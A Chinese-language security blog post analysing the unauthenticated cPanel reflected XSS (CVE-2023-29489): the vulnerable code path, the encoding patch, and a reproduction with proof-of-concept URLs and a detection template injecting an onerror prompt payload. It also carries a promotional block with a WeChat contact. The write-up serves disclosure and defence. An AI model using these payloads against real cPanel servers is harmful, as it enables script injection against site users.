cPanel XSS漏洞分析研究（CVE-2023-29489）

一、漏洞原理

漏洞简述

cPanel 是一套在网页寄存业中最享负盛名的商业软件，是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件；提供了足够强大和相当完整的主机管理功能，诸如：Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。
该漏洞可以无身份验证情况下利用，无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放
漏洞影响范围

供应商：cPanel
产品：cPanel
确认受影响版本：< 11.109.9999.116
修复版本：11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31
漏洞分析

本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理，导致攻击者可以构造恶意代码作为输入进行利用。
Httpd.pm：

1. elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
2. ​
3.    # First 15 chars are “/cpanelwebcall/”
4.    _serve_cpanelwebcall(
5.        $self->get_server_obj(),
6.        substr( $doc_path, 15 ),
7.    );
8. }

复制代码

上述代码说明任何路径均会被路由到，包括目录后的字符部分。
其中涉及函数_serve_cpanelwebcall：

1. sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
2.    require Cpanel::Server::WebCalls;
3.    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
4. ​
5.    $server_obj->respond_200_ok_text($out);
6.    
7.    return;
8. ​
9. }

复制代码

其中局部变量out为handle函数的返回值，是参数webcall_uri_piece的处理结果。

1. sub handle ($request) {
2. ​
3.    my $id = extract_id_from_request($request);
4.    substr( $request, 0, length $id ) = q<>;
5. ​
6.    Cpanel::WebCalls::ID::is_valid($id) or do {
7.        die _http_invalid_params_err("Invalid webcall ID: $id");
8.    };

复制代码

handle函数主要先从request提取id，之后根据id情况进行处理

1. sub _http_invalid_params_err ($why) {
2.    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
3. }

复制代码

_http_invalid_params_err函数主要是返回错误信息
进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理，可被该漏洞利用
【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
补丁部分

在最新版本cPanel可以看到针对该漏洞进行修复
Cpanel/Server/Handlers/Httpd/ErrorPage.pm：

1. ++ use Cpanel::Encoder::Tiny               ();  
2. ​
3. ... omitted for brevity ...
4. ​
5. ++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );

复制代码

二、漏洞复现实战

漏洞复现

首先以某个cPanel target为例
[img=720,592.189349112426]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202305041448825.png[/img]
之后根据POC进行复现
POC：

1. http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
2. http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
3. http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa

复制代码

注：其他端口也有可能存在该漏洞

1. requests:
2.   - method: GET
3.    path:
4.      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
5.    matchers:
6.      - type: word
7.        words:
8.          - '<img src=x onerror="prompt(1)">'

复制代码

执行POC
[img=720,254.53941908713693]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202305041448827.png[/img]
漏洞修复

建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31
启用cPanel 自动更新功能
结束语

本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程，漏洞主要由于涉及交互的关键变量未进行转义或过滤处理，从而造成攻击者可以在无身份验证情况下进行利用。
更多网安技能的在线实操练习，请点击这里>>
 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！